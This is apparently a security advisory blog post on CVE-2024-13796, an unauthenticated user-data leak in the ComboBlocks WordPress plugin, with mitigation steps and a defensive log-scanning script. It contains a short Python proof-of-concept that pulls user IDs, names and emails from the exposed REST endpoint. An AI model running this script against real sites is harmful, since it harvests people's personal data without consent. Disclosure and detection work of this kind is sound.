CVE-2024-13796 is a critical vulnerability identified in "The Post Grid and Gutenberg Blocks – ComboBlocks" plugin for WordPress. Up to and including version 2.3.6, the plugin exposes sensitive information through the /wp-json/post-grid/v2/get_users REST API. This means unauthenticated attackers can potentially access and extract sensitive information, such as user emails and other personal data.

In this post, we'll take a deep dive into the vulnerability, its impact, and how it can be exploited. We'll examine code snippets, share original references, and discuss the potential risks associated with this issue.

What is The Post Grid and Gutenberg Blocks – ComboBlocks?

The Post Grid and Gutenberg Blocks – ComboBlocks is a popular plugin for WordPress. It allows site administrators to create and manage responsive post grids and post listings with the help of the Gutenberg block editor. The plugin's functionality is especially valuable to those who want to create visually appealing, organized, and clean layouts for their blogs or websites.

Vulnerability Details

The vulnerability lies in the /wp-json/post-grid/v2/get_users REST API of the ComboBlocks plugin. This API is designed to return a list of users with details such as usernames, display names, and profile images. However, the plugin does not adequately restrict access to this data, making it possible for unauthenticated attackers to extract sensitive information.

The following code snippet is an example of how an attacker could exploit this vulnerability:

import requests

# REST endpoint exposed without authentication in ComboBlocks <= 2.3.6
target_url = "http://target-site.com/wp-json/post-grid/v2/get_users"
response = requests.get(target_url)
data = response.json()

# The endpoint returns a list of user records
for user in data:
    print(f"User ID: {user['ID']} - Display Name: {user['display_name']} - Email: {user['user_email']}")

Replace "http://target-site.com" with the URL of the targeted WordPress site. Running this script will print the extracted user information to the console.

Original References

1. The CVE announcement and additional details can be found here.
2. Further insight into the vulnerability was provided by the researchers at WPScan in their Vulnerability Database.

To mitigate this vulnerability, it is crucial that you take the following steps:

1. Update the WordPress plugin immediately: If you are using the ComboBlocks plugin, ensure you update it to the latest version as soon as possible. The vulnerability has been fixed in version 2.3.7. Keep in mind that staying up to date with all security updates is an essential practice in maintaining a safe and secure environment for your website.

2. Remove sensitive information: Reconsider storing sensitive and potentially damaging information in the user profile fields. Evaluate the necessity of storing this kind of information within the plugin and look for alternative methods to protect users' privacy.

3. Monitor for signs of exploitation: Regularly check your site's server logs for any signs of unauthorized access or suspicious activities targeting the /wp-json/post-grid/v2/get_users API endpoint, and investigate any potential indicators of compromise.
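As an added example of the log check described in step 3 (not code from the original post or from the plugin), the following Python parses access log lines in the common Apache/nginx "combined" format, keeps only requests to the /wp-json/post-grid/v2/get_users endpoint, and counts how many responses actually served data (2xx) per client IP. The sample log lines are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2025:10:12:01 +0000] "GET /wp-json/post-grid/v2/get_users HTTP/1.1" 200 2381 "-" "python-requests/2.31.0"
198.51.100.7 - - [01/Mar/2025:10:12:04 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Mar/2025:10:12:09 +0000] "GET /wp-json/post-grid/v2/get_users?page=2 HTTP/1.1" 200 2290 "-" "python-requests/2.31.0"
192.0.2.44 - - [01/Mar/2025:10:13:30 +0000] "GET /wp-json/post-grid/v2/get_users HTTP/1.1" 401 87 "-" "curl/8.4.0"
"""

# Fields of the combined log format: client IP, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ENDPOINT = "/wp-json/post-grid/v2/get_users"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_get_users_hits(log_text):
    """Return parsed entries whose request path is the vulnerable endpoint."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        # Compare the path only; the query string (e.g. ?page=2) is irrelevant.
        if entry["path"].split("?", 1)[0] == ENDPOINT:
            hits.append(entry)
    return hits


def summarize(hits):
    """Count 2xx responses per client IP. Only 2xx responses mean the user
    list was actually served, which is what matters on an unpatched site."""
    return Counter(h["ip"] for h in hits if h["status"].startswith("2"))


if __name__ == "__main__":
    for ip, n in summarize(find_get_users_hits(SAMPLE_LOG)).most_common():
        print(f"{ip}: {n} successful get_users response(s)")
```

On a real server, feed the access log through find_get_users_hits instead of SAMPLE_LOG; any 2xx hit recorded before the plugin was updated to 2.3.7 should be treated as a likely disclosure of the user list to that client.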

Conclusion

Staying informed about emerging threats and vulnerabilities like CVE-2024-13796 is vital for maintaining the digital security of your website. By remaining vigilant and implementing the recommended mitigation steps, you can protect your users' data and ensure the integrity and safety of your WordPress site.

Timeline

Published on: 02/28/2025 05:15:32 UTC
Last modified on: 03/06/2025 20:49:05 UTC